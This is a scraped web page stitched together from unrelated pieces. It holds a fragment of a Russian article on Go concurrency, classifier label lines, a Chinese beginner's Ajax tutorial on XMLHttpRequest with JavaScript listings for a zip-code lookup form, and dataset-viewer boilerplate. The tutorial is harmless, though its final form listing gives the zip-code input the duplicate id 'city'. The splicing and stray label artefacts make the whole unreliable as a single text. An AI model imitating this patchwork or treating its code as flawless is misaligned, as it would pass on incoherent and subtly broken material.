So the purpose is not only to be recognized as a rotate. In that case, we have better ways to say the same thing, e.g. __builtin_rotate(x,n). The difference is that the code in this post gives the compiler enough information to implement a correct rotate in all circumstances, including those where it has an instruction and those where it doesn’t.
I don’t mean to be a C/C++ apologist, I hate all this stuff. But even so, I think it’s valuable to document the current best practice (as I understand it). If 5 out of 10 crypto library authors are doing it wrong, then clearly there’s a need for this information to be put out there.
4. John — I didn’t mean to downplay the importance of this blog post. I have certainly needed to write high-performance rotate code in C, and I definitely wish I had seen this posting when I struggled to do it the right way. I am angry that there is not a simple, direct way to express this instead of having to go through this complicated charade.
5. Rotation constants in cryptographic code are in an overwhelming amount of cases known at compile time (RC6 is one of the few exceptions). This allows us to resolve this at compile time with either macros (C), or templates (C++). C++11 example:
template
using rot_t = std::integral_constant;
template
uint32_t rol(uint32_t x, rot_t)
{
return (x <> ((32-c)&31));
}
// x = rol(x, rot());
This way, the backend will be able to properly optimize the rotation. And since the type of the constant is distinct of plain uint32_t, this can be used side-by-side with a non-compile-time function that does the proper checks.
6. The (-n&31) trick to eliminate the branch is neat, but doesn’t C++ still permit one’s complement representation for signed integers, in which case it gets the wrong answer (e.g., for n=1 we get (-n&31) == 30)?
7. Good timing for this post and the last one, as I just reviewed a patch adding centralized rotation methods to Mozilla’s code (to cut down on duplicates overall) last week, with the shift-by-0 error in them, then stumbled across these posts only a day or two later. 🙂
It looks like all Mozilla’s rotation uses rotate by constants. So there’s no issue with existing code in these ways, just a lurking one for future uses. (Does non-constant rotation have use cases? None spring immediately to mind.) I too agree with David that it’s kind of sad C/C++ make it so difficult to do this.
Note that negating an unsigned type triggers compiler warnings with some compilers (MSVC particularly), because negating a non-negative number and getting back a non-negative number is a bit confusing. (Notwithstanding that it’s well-defined in C/C++. But only sometimes — thanks, integral promotion!) So even if every compiler optimized rotl32c properly, I still probably wouldn’t use it.
8. regehr: uint32_t is unsigned so it can’t represent negative values and therefore isn’t two’s complement on any architecture. My thought was that taking the negative of it would undergo integral conversion to a signed value. I think 0-n would do that, but I see that unary negative applied to an unsigned integral value (in C++11 at least) does produce an unsigned integral value (defined to be 2^b – n when b is the number of bits in the promoted type of n).
So this trick should work on a one’s complement system (in at least C++11, and assuming integral promotion doesn’t somehow enter undefined behavior space).
9. You can avoid UB rotating a little each time:
unsigned int rol_ub(unsigned int value, unsigned int amount)
{
assert(amount > 0);
assert(amount < 32);
return (value << amount) | (value >> (32 – amount));
}
unsigned int rol_step(unsigned int value, unsigned int amount)
{
unsigned result = value;
result = rol_ub(result, 1 + amount/2);
result = rol_ub(result, 1 + (amount – amount/2));
result = rol_ub(result, 30);
return result;
}
Neither clang nor gcc fuse the rotations, though.
10. The language used in the standard says unsigned integral types behave as the integers modulo 2^n. This is equivalent to 2’s complement.
11. pabigot: 0-n works just as well as -n: the 0 is promoted to the same unsigned type as n and then the subtraction is done using the rules for unsigned types, which are that the result has one less than the maximum number representable in that type added or subtracted until the result is in range.
(This is as long as the type of n is at least as wide as ‘unsigned int’ – if it’s narrower, it may be promoted to signed int, but that problem also exists for the -n variant).
12. “The language used in the standard says unsigned integral types behave as the integers modulo 2^n. This is equivalent to 2′s complement.”
Yes, ISO/IEC 14882:2011 section 3.9.1 graf 4 specifies that unsigned integer types obey the laws of arithmetic modulo 2^N (first sentence above). Inferring from this any operational relationship to 2’s complement (second sentence above) is, I believe, a mistake. I suppose you could say that it’s equivalent to [arithmetic in] two’s complement as long as the resulting value remains within the non-negative portion of the two’s complement value range, but that’s not a useful generalization.
It is still permissible for implementations to use other representations for signed integer types (3.9.1 graf 7), and there are still situations where an unsigned operand is converted to a signed type. For example, had the code been (0-n)&0x1F I believe the wrong answer would be obtained on implementations that (a) had sizeof(int)>sizeof(uint32_t) (5 graf 10) and (b) used one’s complement representation for signed integral values. The fact that n happened to be an unsigned integral type is irrelevant because it would have been promoted to a signed value.
My error was in assuming -n was the same as 0-n, which involves arithmetic conversion and thus may produce a negative signed value. For unsigned integral types the expression -n (see 5.3.1 graf 8) is not the same as the expression 0-n (see 5.7 et alia). The code of rotl32c never introduces signed values so the question of signed representation is moot, and I’m sorry my confusion suggested the issue arose.
13. pabigot: The unary – operator performs the integer promotions on its operand. As you note, if int can represent all the values of uint32_t, the integer promotions will promote n to int.
In this situation though (where ‘int’ is wider than 32 bits), the left shift is also problematic because of the promotion of x! A fully portable version must convert the uint32_t x value to unsigned long before shifting (in fact the n function argument could/should simply be unsigned int).
14. kme: Yes, I hadn’t thought that all the way through. 4.5 graf 1 and 2 makes clear that “small” unsigned types will be promoted to signed int, potentially opening up a big can of mess.
However, I’m not entirely convinced for the case of -n versus 0-n because 5.3.1 graf 8 specifies the calculation for negative of an “unsigned quantity” to be subtraction from 2^n which will produce a positive value, unlike subtraction from 0 which produces a non-positive value. Does the fact the promoted type is signed override the fact that the operand is known to be an “unsigned quantity”? If not, the negation and subsequent bitmask still produces the right value regardless of representation of negative integral values.
(I also agree that the type of n would better have been unsigned int to begin with.)
That the value-to-be-rotated might become signed as a result of integral promotion is a different question that I hadn’t considered, and I agree (per 5.8 graf 2) that this means a left shift that overflows evokes undefined behavior. Though I believe a cast of x to unsigned int would be sufficient in the case in question (where the rank of uint32_t is less than the rank of int); no need to go all the way to unsigned long.
Fortunately C++11 has the expressive power to ensure the operation is always well-defined, through static_assert so the implementation of the function can verify at compile-time the conditions required, or std::enable_if or material in to specialize an alternative implementation that does any necessary casts.
15. > Furthermore, it has the purpose of being recognizably a rotate that can be exploited by the compiler to generate an appropriate instruction should it be available (and certainly it will not be on some platforms).
There are certainly platforms without rotate instructions, C is useful on these platform OK, now can these platforms really run C++?
I really doubt it!
So while C’s behaviour is understandable, C++ should provide a rotate operation.
16. Why should C++ provide a rotate operation when it’s so easy to do it yourself?
Potential irony aside, https://gist.github.com/pabigot/7550454 eliminates all sources of undefined behavior that I’ve identified, and will produce a compile-time error if the algorithm’s preconditions are not met. It also generates similarly optimal code under current gcc (-std=c++11 -O3) as is produced for rotl32c. I like C++11.
I believe comments on the approach can be made on the gist page if anybody finds a mistake.
17. I suggest casting x to unsigned long because that type must be at least 32 bits wide, whereas unsigned int does not.
Comments are closed.
|
__label__pos
| 0.624273 |
How to make a creative TIMELINE in Word in a few steps (example) - See how it's done
In Word we can create countless text documents that we can use on a daily basis and with a professional finish, for example; how write a recommendation letter with step by step words , books and more. In just a few steps we will teach you the technique for a professional result how to create a creative timeline in word. You can not miss it!
How to create a creative TIMELINE in Word in a few steps
In style Power point , allows us to create text documents with several pages that, once finished, we can convert into an editable PDF file, in this way our work remains professional and editable to make any modification of the text, image and add more content to it.
add a comment of How to make a creative TIMELINE in Word in a few steps (example) - See how it's done
Comment sent successfully! We will review it in the next few hours.
|
__label__pos
| 0.981398 |
×
How to generate SSH Keys in Linux?
How to generate SSH Keys in Linux?
Are you trying to generate ssh keys under Linux / UNIX operating systems for remote login?
This guide is for you.
An SSH key is an access credential in the SSH protocol. Its function is similar to that of user names and passwords.
Here at LinuxReels, as part of our Server Management Services, we regularly help our Customers to perform Software Installation Tasks for their Linux Server.
In this context, we shall look into steps to create ssh keys as follows on any Linux or UNIX-like operating systems.
How to generate SSH Keys in Linux?
In Linux, you can use the ssh-keygen command to Generate SSH Keys.
Basically, the ssh-keygen command generates, manages and converts authentication keys for ssh client and server usage.
In order to generate ssh keys, simply log into your Server with an SSH tool such as putty as the root user and execute the command below;
$ ssh-keygen
This will generate SSH keys which will be stored in the "~/.ssh/" directory.
The ssh keys contains the following files;
/.ssh/id_rsa – Your private key. Do not share this file with anyone. Keep it private
/.ssh/id_rsa.pub – Your public key.
Please note that the passphrase must be different from your current password and do not share keys or passphrase with anyone. Also, make sure you have correct and secure permissions on /.ssh/ directory:
ls -ld /.ssh/
chmod 0600 /.ssh/
What to do after generating an SSH Keys?
You need to copy /.ssh/id_rsa.pub file to remote server so that you can login using keys instead of the password.
Use the following command to copy key to remote server called "server1.LinuxReels.com" for root user:
ssh-copy-id [email protected]
Then, to login simply enter:
ssh [email protected]
[Need urgent assistance in solving Linux related errors? We are available to help you today.]
Who We Are ?
Most prominent, efficient, and well-performing IT companies and software solutions.
Related Posts
|
__label__pos
| 0.968296 |
SIMPLE SOLUTIONS
RANDOM.STATE(3O) - Linux man page online | Library functions
No description.
Chapter
source:
Random.State(3o) OCamldoc Random.State(3o)
NAME
Random.State - no description Module Module Random.State Documentation Module State : sig end type t The type of PRNG states. val make : int array -> t Create a new state and initialize it with the given seed. val make_self_init : unit -> t Create a new state and initialize it with a system-dependent low-entropy seed. val copy : t -> t Return a copy of the given state. val bits : t -> int val int : t -> int -> int val int32 : t -> Int32.t -> Int32.t val nativeint : t -> Nativeint.t -> Nativeint.t val int64 : t -> Int64.t -> Int64.t val float : t -> float -> float val bool : t -> bool These functions are the same as the basic functions, except that they use (and update) the given PRNG state instead of the default one.
2017-10-20 source: Random.State(3o)
Download raw manual
Main page OCamldoc (+159) 2017-10-20 (+158) № 3 (+68044)
Go top
|
__label__pos
| 0.697032 |
Super User is a question and answer site for computer enthusiasts and power users. It's 100% free, no registration required.
Sign up
Here's how it works:
1. Anybody can ask a question
2. Anybody can answer
3. The best answers are voted up and rise to the top
I have a backup / autoupdate process for my software, and usually I create a new user for running it in task scheduler (most users don't have a password, and task scheduler needs it, don't know why).
Then I've seen that google chrome installs it's auto-update task to run as "NT AUTHORITY\SYSTEM", I've tested it and it works great with my programs too, and it looks more clean,
there are some hidden drawbacks here I'm not seeing?
Thanks!
share|improve this question
My recommendation
For a single machine, the most straight forward method is to create an account under the Builtin Backup Operators group.
There are two large drawbacks that initially come to mind when running programs under SYSTEM.
Security
Almost always the biggest reason admins create discreet accounts for scheduled processes is to monitor them and grant them access one would normally not grant to a typical running application. In this case, it needs read access to all files and needs write access to your backup storage location, the later tending to have more strict access.
To give any program that runs as SYSTEM amounts to running them as an admin more or less, thus granting it more privileges than it needs. There is a built in Backup Operators group for this reason.
UAC
The SYSTEM account is sometimes mistaken by users as a SuperUser or a root account. It is neither. It is used internally by Windows. It was never intended to be used by programs unless the program specifies it. That said, there are unknown bugs that creep up if running a program not designed for the SYSTEM account. For one, notice there is no user password for it. Nor is it actually a user account if you try to authenticate to it remotely.
Anecdotally,, UAC also plays havoc with programs that run under the SYSTEM context. I've seen badly written programs straight up throw up a dialog asking the user to "run as Admin." Go figure.
Also there is an MSDN blog post that comes to mind that I cannot find that the author spent a whole day debuggging SQL Server on a client's machine. Fresh install . . . or so they thought. Turns out, a certain component of the OS itself was switched from NT AUTHORITY\NETWORK SERVICE to SYSTEM, under the guise that it had a more permissions and privileges than any other account. Rather, it just has different ones.
share|improve this answer
Your Answer
discard
By posting your answer, you agree to the privacy policy and terms of service.
Not the answer you're looking for? Browse other questions tagged or ask your own question.
|
__label__pos
| 0.600196 |
Tuning and Profiling Logstash Performance
The Logstash defaults are chosen to provide fast, safe performance for most users. However if you notice performance issues, you may need to modify some of the defaults. Logstash provides the following configurable options for tuning pipeline performance: pipeline.workers, pipeline.batch.size, and pipeline.batch.delay. For more information about setting these options, see logstash.yml.
Make sure you’ve read the Performance Troubleshooting Guide before modifying these options.
• The pipeline.workers setting determines how many threads to run for filter and output processing. If you find that events are backing up, or that the CPU is not saturated, consider increasing the value of this parameter to make better use of available processing power. Good results can even be found increasing this number past the number of available processors as these threads may spend significant time in an I/O wait state when writing to external systems. Legal values for this parameter are positive integers.
• The pipeline.batch.size setting defines the maximum number of events an individual worker thread collects before attempting to execute filters and outputs. Larger batch sizes are generally more efficient, but increase memory overhead. Some hardware configurations require you to increase JVM heap space in the jvm.options config file to avoid performance degradation. (See Logstash Configuration Files for more info.) Values in excess of the optimum range cause performance degradation due to frequent garbage collection or JVM crashes related to out-of-memory exceptions. Output plugins can process each batch as a logical unit. The Elasticsearch output, for example, issues bulk requests for each batch received. Tuning the pipeline.batch.size setting adjusts the size of bulk requests sent to Elasticsearch.
• The pipeline.batch.delay setting rarely needs to be tuned. This setting adjusts the latency of the Logstash pipeline. Pipeline batch delay is the maximum amount of time in milliseconds that Logstash waits for new messages after receiving an event in the current pipeline worker thread. After this time elapses, Logstash begins to execute filters and outputs.The maximum time that Logstash waits between receiving an event and processing that event in a filter is the product of the pipeline.batch.delay and pipeline.batch.size settings.
Notes on Pipeline Configuration and Performance
If you plan to modify the default pipeline settings, take into account the following suggestions:
• The total number of inflight events is determined by the product of the pipeline.workers and pipeline.batch.size settings. This product is referred to as the inflight count. Keep the value of the inflight count in mind as you adjust the pipeline.workers and pipeline.batch.size settings. Pipelines that intermittently receive large events at irregular intervals require sufficient memory to handle these spikes. Set the JVM heap space accordingly in the jvm.options config file. (See Logstash Configuration Files for more info.)
• Measure each change to make sure it increases, rather than decreases, performance.
• Ensure that you leave enough memory available to cope with a sudden increase in event size. For example, an application that generates exceptions that are represented as large blobs of text.
• The number of workers may be set higher than the number of CPU cores since outputs often spend idle time in I/O wait conditions.
• Threads in Java have names and you can use the jstack, top, and the VisualVM graphical tools to figure out which resources a given thread uses.
• On Linux platforms, Logstash labels all the threads it can with something descriptive. For example, inputs show up as [base]<inputname, and pipeline workers show up as [base]>workerN, where N is an integer. Where possible, other threads are also labeled to help you identify their purpose.
Profiling the Heap
When tuning Logstash you may have to adjust the heap size. You can use the VisualVM tool to profile the heap. The Monitor pane in particular is useful for checking whether your heap allocation is sufficient for the current workload. The screenshots below show sample Monitor panes. The first pane examines a Logstash instance configured with too many inflight events. The second pane examines a Logstash instance configured with an appropriate amount of inflight events. Note that the specific batch sizes used here are most likely not applicable to your specific workload, as the memory demands of Logstash vary in large part based on the type of messages you are sending.
pipeline overload
pipeline correct load
In the first example we see that the CPU isn’t being used very efficiently. In fact, the JVM is often times having to stop the VM for “full GCs”. Full garbage collections are a common symptom of excessive memory pressure. This is visible in the spiky pattern on the CPU chart. In the more efficiently configured example, the GC graph pattern is more smooth, and the CPU is used in a more uniform manner. You can also see that there is ample headroom between the allocated heap size, and the maximum allowed, giving the JVM GC a lot of room to work with.
Examining the in-depth GC statistics with a tool similar to the excellent VisualGC plugin shows that the over-allocated VM spends very little time in the efficient Eden GC, compared to the time spent in the more resource-intensive Old Gen “Full” GCs.
As long as the GC pattern is acceptable, heap sizes that occasionally increase to the maximum are acceptable. Such heap size spikes happen in response to a burst of large events passing through the pipeline. In general practice, maintain a gap between the used amount of heap memory and the maximum. This document is not a comprehensive guide to JVM GC tuning. Read the official Oracle guide for more information on the topic. We also recommend reading Debugging Java Performance.
|
__label__pos
| 0.594262 |
From patchwork Wed Apr 21 12:27:04 2021 Content-Type: text/plain; charset="utf-8" MIME-Version: 1.0 Content-Transfer-Encoding: 8bit X-Patchwork-Submitter: Nicolas George X-Patchwork-Id: 27198 Delivered-To: [email protected] Received: by 2002:a6b:5014:0:0:0:0:0 with SMTP id e20csp349996iob; Wed, 21 Apr 2021 05:28:13 -0700 (PDT) X-Google-Smtp-Source: ABdhPJz3Z33W1ZcVk36M5/6kgWTRIvQtRrexi+BlFwS9+tGMMaWLQDqr9csHq1TpDCopLK4coRrx X-Received: by 2002:a17:906:6896:: with SMTP id n22mr33088926ejr.316.1619008092877; Wed, 21 Apr 2021 05:28:12 -0700 (PDT) ARC-Seal: i=1; a=rsa-sha256; t=1619008092; cv=none; d=google.com; s=arc-20160816; b=ILwnJpk6jVvGeRZXwOCjUDkYB1tUgeCbEkMHQM9bOAH9TSsNpoX3Lz3WQ2j3Kw1XkJ /wP5Gx0wq4J/qoaXVZ/y16BeIUnfWmVgB+20mlRHFkFUY+I+Mnw4QuKqIDGIzP9JQ5wP NzMCMvU5ixjcFWhwYXAGaSyvIoJKpGEJYBP4yfWp2kna8lIV0w4HiTivh49/qb3tRDYP jvSC58vPS6JR8O7pcuAxMvp0zyHgJgA5BWjs5vZQg3WqNt9fdAuhUsIXG8F4L1Mtkaom 4tLYcL+TRfjFtKs9+YcLzZp8KJdxgV303PTMigSsYg0l4FstrsywQ9RdqShX8EHHUeOr r6YQ== ARC-Message-Signature: i=1; a=rsa-sha256; c=relaxed/relaxed; d=google.com; s=arc-20160816; h=sender:errors-to:content-transfer-encoding:reply-to:list-subscribe :list-help:list-post:list-archive:list-unsubscribe:list-id :precedence:subject:mime-version:references:in-reply-to:message-id :date:to:from:delivered-to; bh=by/puLi1KazIx4JK7XX9BQNAonW+3oEn9zP7Kg/QSX8=; b=JHXMazacLC9G4ozUpbOvuS0yzHRdVmA/p4tKzEA6+JZ5ao6pJf+9/3UWlEu9eoSEzW +OtjoTV68o6wvCi/NzSCZ3UURKkU/M5xv6nScxk5oNniiJcbC0BBs4KinLAdm9cvtP/k IKE2iESyuLIf84JzJJRKhlzmq/+6H/9gSV8zAe9SfH+S/EmfUFWDMPlAG2MxUUy5FFox h4syVzeGIe4yjydG/IKFu/KtCR0k9jFflA2OHRabSWqx11oco9JZ0abRGIppQwodC7oz SODIOwJMcIXdmKVGkbgwPTbDRdRt8+wEw+biiJUQQFSHkjAvTgCMDY4HRdvFf15Xf29J oX7A== ARC-Authentication-Results: i=1; mx.google.com; spf=pass (google.com: domain of [email protected] designates 79.124.17.100 as permitted sender) [email protected] Return-Path: Received: from ffbox0-bg.mplayerhq.hu (ffbox0-bg.ffmpeg.org. [79.124.17.100]) by mx.google.com with ESMTP id k14si1686906ejc.229.2021.04.21.05.28.12; Wed, 21 Apr 2021 05:28:12 -0700 (PDT) Received-SPF: pass (google.com: domain of [email protected] designates 79.124.17.100 as permitted sender) client-ip=79.124.17.100; Authentication-Results: mx.google.com; spf=pass (google.com: domain of [email protected] designates 79.124.17.100 as permitted sender) [email protected] Received: from [127.0.1.1] (localhost [127.0.0.1]) by ffbox0-bg.mplayerhq.hu (Postfix) with ESMTP id 026DF689B83; Wed, 21 Apr 2021 15:27:22 +0300 (EEST) X-Original-To: [email protected] Delivered-To: [email protected] Received: from nef.ens.fr (nef2.ens.fr [129.199.96.40]) by ffbox0-bg.mplayerhq.hu (Postfix) with ESMTPS id E78406899CF for ; Wed, 21 Apr 2021 15:27:13 +0300 (EEST) X-ENS-nef-client: 129.199.129.80 ( name = phare.normalesup.org ) Received: from phare.normalesup.org (phare.normalesup.org [129.199.129.80]) by nef.ens.fr (8.14.4/1.01.28121999) with ESMTP id 13LCRClv006300 for ; Wed, 21 Apr 2021 14:27:12 +0200 Received: by phare.normalesup.org (Postfix, from userid 1001) id 23E95EB5BC; Wed, 21 Apr 2021 14:27:12 +0200 (CEST) From: Nicolas George To: [email protected] Date: Wed, 21 Apr 2021 14:27:04 +0200 Message-Id: <[email protected]> X-Mailer: git-send-email 2.30.2 In-Reply-To: <[email protected]> References: <[email protected]> MIME-Version: 1.0 X-Greylist: Sender IP whitelisted, not delayed by milter-greylist-4.4.3 (nef.ens.fr [129.199.96.32]); Wed, 21 Apr 2021 14:27:13 +0200 (CEST) Subject: [FFmpeg-devel] [PATCH 5/7] WIP: add an intro to AVWriter X-BeenThere: [email protected] X-Mailman-Version: 2.1.29 Precedence: list List-Id: FFmpeg development discussions and patches List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , Reply-To: FFmpeg development discussions and patches Errors-To: [email protected] Sender: "ffmpeg-devel" X-TUID: FzZvV32l9ZUU Signed-off-by: Nicolas George --- avwriter_intro.txt | 261 +++++++++++++++++++++++++++++++++++++++++++++ 1 file changed, 261 insertions(+) create mode 100644 avwriter_intro.txt diff --git a/avwriter_intro.txt b/avwriter_intro.txt new file mode 100644 index 0000000000..b1b54711c9 --- /dev/null +++ b/avwriter_intro.txt @@ -0,0 +1,261 @@ +XXX make error return more strict +XXX? make buf size return more foolproof + + +# An introduction to the AVWriter API. + +Do not look at the length headers. Do not look at the convoluted API. Just +imagine these few use cases. + + +## Scenario 1: You need to call a function that takes an AVWriter. + +What are AVWriter anyway? They are for when a function returns a string. +For example, take the very common: + + int av_foobar_to_string(char *buf, size_t buf_size, const AVFoobar *foobar); + +It uses buf[] to return the string. In the simplest cases, you call it with +a buffer on the stack: + + char buf[1024]; + ret = av_foobar_to_string(buf, sizeof(buf)); + +Now, with AVWriter. The function you need to call is: + + void av_foobar_write(AVWriter wr, const AVFoobar *foobar); + +And you use the av_buf_writer_array() macro to encode buf as an AVWriter: + + char buf[1024]; + ret = av_foobar_write(av_buf_writer_array(buf), foobar); + +For all you know, av_buf_writer_array() could just be a fancy name for a +macro that just expands to "buf, sizeof(buf)". And if you want to stop here +and just use AVWriter the way you do in good old C, you can. But if you read +on, you will see that it is much fancier than that, while being almost as +simple to use. + + +## Scenario 2: Concatenating the string into a message. + +Let us say you have two foobars to present to the user. Good old C: + + char msg[2500], foo1_buf[1000], foo2_buf[1000]; + av_foobar_to_string(foo1_buf, sizeof(foo1_buf), foo1); + av_foobar_to_string(foo2_buf, sizeof(foo2_buf), foo2); + snprintf(msg, sizeof(msg), "F%d = [ %s, %s ]", num, foo1_buf, foo2_buf); + +But it's ugly. Less ugly, but more complicated: + + char msg[2500]; + size_t pos = 0; + pos += snprintf (msg + pos, sizeof(msg) - pos, "F%d = [ ", num); + av_foobar_to_string(msg + pos, sizeof(msg) - pos, foo1); + pos += strlen(msg + pos); + pos += snprintf (msg + pos, sizeof(msg) - pos, ", "); + av_foobar_to_string(msg + pos, sizeof(msg) - pos, foo2); + pos += strlen(msg + pos); + pos += snprintf (msg + pos, sizeof(msg) - pos, "]"); + +(Note: that's buggy, the snprintf() in the middle can overflow.) + +Well, that was the first thing AVWriter was meant to do: allow to build +strings by concatenating them together. So, the AVWraper version of this +code: + + char msg[2500]; + AVWriter wr = av_buf_writer_array(msg); + av_writer_printf(wr, "F%d = [ ", num); + av_foobar_write(wr, foo1); + av_writer_print(wr, ", "); + av_foobar_write(wr, foo2); + av_writer_print(wr, " ]"); + +(I am confident I can teach av_writer_printf() to call av_foobar_write().) + +If I have my way, we will have "av_writer_fmt(AVWriter wr, const char *fmt, +...);" where the arguments can be any type for which somebody have bothered +to implement a _write() function. But that is for a bit later. + +And that's it. av_buf_writer_array() is just fancy macro work to keep track +with a "size_t pos". + +But don't use it, it's rubbish. Use av_dynbuf_writer(), it's fancier. + + +## Scenario 3: The strings are long and precious. + +Let us say that the string you are building can be arbitrarily long, and it +is important to have it in its entirety. With good old C, you have to rely +on some kind of realloc(). You know the kind of code, it is very boring, I +will not write it here. + +That's exactly what av_buf_writer_array() is for. As a special optimization, +it starts with a buffer on the stack, which means that for small strings, it +will be as fast as the char[] version. + +XXX+ the commit says av_dynbuf_get_buffer in the doxy and other inconsistencies + + AVWriter wr = av_dynbuf_writer(); + /* same code as above */ + char *msg = av_dynbuf_writer_get_data(wr, NULL); + use_the_message(msg); + av_dynbuf_writer_finalize(wr, NULL, NULL); + +WARNING: I have not covered error checking. Without error checking, this +code will not cause an invalid memory access, and in particular will not be +a security issue by itself, but it will cause the string to be truncated. +That means silent data corruption, which is worse than a non-exploitable +crash. + + +## Scenario 4: So let's do error checks. + +The example code above will not crash. At all point, +av_dynbuf_writer_get_data() will point to a valid 0-terminated buffer. If +you know your data is can be truncated later, then maybe you can tolerate to +have it truncated here, especially since that kind of memory allocation +failure is very very unlikely. + +But you are not lazy, and it's better to diaplay "Out Of Cheese Error" than +to store corrupted data without noticing. + + ret = av_dynbuf_writer_get_error(wr, &size); + if (ret < 0) { + fprintf("Could not display foobar, would have been %zu long", size); + return ret; + } + +XXX ça c'est bien, mais av_dynbuf_writer_get_data() devrait retourner une valeur sûre + + +## Scenario 5: We want to keep the string. + +Maybe what we will do with the message is something like: + + av_dict_set(metadata, "foo_pair", msg); + +But if av_dynbuf_writer() did use use dynamic allocation, we could use +AV_DICT_DONT_STRDUP_VAL. + +That's what the pointers arguments to av_dynbuf_writer_finalize() are for. + + ret = av_dynbuf_writer_finalize(wr, &msg, NULL); + if (ret < 0) + return ret; + av_dict_set(metadata, "foo_pair", msg, AV_DICT_DONT_STRDUP_VAL); + + +XXX+ av_dynbuf_writer_finish error if truncated, av_dynbuf_writer_finish_anyway. +XXX+ error check is all wrong + + +## Scenario 6: You work with a library that already has string functions. +## Scenario 7: You work with an API that does its own buffering. + +Let us say you are writing a Gtk+ application and you already use GString +all over the place. (Note: GString is more or less like av_dynbuf_writer(), +but with the Gtk+ taste instead of the FFmpeg taste; the API example should +be obvious.) You could always: + + av_foobar_write(wr, foo); + char *msg = av_dynbuf_writer_get_data(wr, NULL); + g_string_append(str, msg); + +But that's clumsy, you have to copy the string. If this comes frequently in +the code, it would be better to have AVWriter collaborate with GString: + + av_foobar_write(gstring_writer(str), foo); + +To be able to do that you need to implement a few callbacks and adapt some +boilerplate code. It is not difficult, but too long for this introduction. + +There is no central repository, neither static nor dynamic. As soon as a +part of a program has implemented the proper callbacks and set the proper +pointers, it makes a valid AVWriter that can be used anywhere. + +Note that it applies to any kind of library or API: as the name says, +AVWriter is made to write strings. Any API that looks like writing can be +desguised as AVWriter. + +For example, there is another built-in AVWriter: av_log_writer(obj) it goes +directly to av_log(obj, AV_LOG_INFO); + + +## Scenario 8: This time, you are the one who returns a string. + +This time, you are the one who was about to write: + + int av_bazqux_to_string(char *buf, size_t size, const Bazqux *baz); + +and you decide to write it: + + void av_bazqux_write(AVWriter wr, const Bazqux *baz); + +There is nothing new to say, you already know how to add things to an +AVWriter, it is in the second example: + + av_writer_printf(wr, ...); + +Just use this, or any of the similar functions, to add whatever you want to +the AVWriter you got as an argument. There is no error checking to do: it is +not your responsibility. + +At this point, you could implement av_bazqux_to_string() as a trivial +wrapper: + + int av_bazqux_to_string(char *buf, size_t size, const Bazqux *baz) { + av_bazqux_write(av_buf_writer(buf, size), baz); + if (strlen(baz) == size - 1) + return AVERROR_BUFFER_TOO_SMALL; + } + +(Since av_buf_writer() does not keep track of error, we consider that +reaching the end is already overflowing. We are wasting one char in a very +rare situation.) But is it really useful? + + +## Scenario 9: What with the types? + +If you are observant, you will wonder what happens if we write: + + AVWriter wr = av_log_writer(buf); + char *msg = av_dynbuf_writer_get_data(wr, NULL); + +The short answer is: it will crash, badly. And that's ok: you knew you were +doing something stupid. You got what you deserved. Same as if you had written: + + char *msg = NULL; + snprintf(msg, strlen(msg), "Good Bye"); + +The C language is based on the assumption that you know things about the +code that cannot be expressed in the language itself, in particular with the +type system. There is no type for non-NULL-pointer, yet there are places in +the code you know for certain that a pointer is not NULL. + +AVWriter is designed with the same philosophy. When you write + + AVWriter wr = av_dynbuf_writer(); + +you know that wr is actually an AVDynbufWriter, and therefore you can call +av_dynbuf_writer_get_data() on it. + +On the other hand, if you have an AVWriter of unknown origin, you cannot +call a specific function. But you can call all the av_writer_whatever() +functions. + +If you want to make a special case, to check for a specific kind of +AVWriter, you can use: + + if (av_dynbuf_writer_check(wr)) + +In fact, all functions that accept only a specific kind of AVWriter in +FFmpeg start with some kind of: + + av_assert1(av_dynbuf_writer_check(wr)); + +That means that if you are working with a libavutil built for development, +if you make a mistake, you will get a clear error message. But really, there +is no reason to make a mistake if you are not trying to tie your brain in a +knot.
|
__label__pos
| 0.545897 |
1
I'm a newbie to Monero. My question is how Monero does the amount checking logic (the input amount should be larger than the output amount in a transaction) when a node receives a raw transaction.
I found there is some checking logic in wallet implementation wallet2::create_transactions_2.
THROW_WALLET_EXCEPTION_IF(needed_money + min_fee > balance_subtotal, error::not_enough_money, balance_subtotal, needed_money, 0);
THROW_WALLET_EXCEPTION_IF(needed_money + min_fee > unlocked_balance_subtotal, error::not_enough_unlocked_money, unlocked_balance_subtotal, needed_money, 0);
And tx_memory_pool::add_tx also has some checking logic when tx.version == 1
if (tx.version == 1)
{
uint64_t inputs_amount = 0;
if(!get_inputs_money_amount(tx, inputs_amount))
{
tvc.m_verifivation_failed = true;
return false;
}
uint64_t outputs_amount = get_outs_money_amount(tx);
if(outputs_amount > inputs_amount)
{
LOG_PRINT_L1("transaction use more money than it has: use " << print_money(outputs_amount) << ", have " << print_money(inputs_amount));
tvc.m_verifivation_failed = true;
tvc.m_overspend = true;
return false;
}
else if(outputs_amount == inputs_amount)
{
LOG_PRINT_L1("transaction fee is zero: outputs_amount == inputs_amount, rejecting.");
tvc.m_verifivation_failed = true;
tvc.m_fee_too_low = true;
return false;
}
fee = inputs_amount - outputs_amount;
}
else
{
fee = tx.rct_signatures.txnFee;
}
But I don't think we use version 1 in transaction right now.
Could somebody give me a hint? Or is it impossible to do this kind of check in the raw transaction?
1
You already found the place for v1 transactions. For v2 (RingCT) transactions, since in/out amounts are masked, the check is done in src/ringct/rctSigs.cpp, in either verRctSemanticsSimple or verRct (depending on the signature type):
//check pseudoOuts vs Outs..
if (!equalKeys(sumPseudoOuts, sumOutpks)) {
LOG_PRINT_L1("Sum check failed");
return false;
}
This compares the sum of (masked) inputs to the sum of (masked) outputs plus the masked fee (the fee is not masked in the actual transaction, so the verification code masks it at that time). The dozen lines above perform these sums.
| improve this answer | |
• This is incorrect. equalKeys is checking if the keys match, not the sum of masked amounts. The ultimate check of amounts is the range proof check per my answer. – jtgrassie Feb 22 '19 at 23:14
• Not quite. Range proofs aren't about checking outputs <= inputs, they're about checking they're in valid range. They also have nothing to do with inputs, so cannot be used for checking outputs <= inputs by deduction :) – user36303 Feb 23 '19 at 16:14
• The range proof is specifically used to prove the total value of inputs is greater than or equal to the total value of outputs (so it's positive) and within a range. This is so money cannot be created from thin air. – jtgrassie Feb 23 '19 at 18:10
• And it's this range proof the OP is asking about: "(the input amount should be larger than the output amount in a transaction)". – jtgrassie Feb 23 '19 at 18:14
0
Firstly, the current transaction version used is 2.
Second, you found the check in create_transactions_2 which ensures there is enough money to fund the transaction.
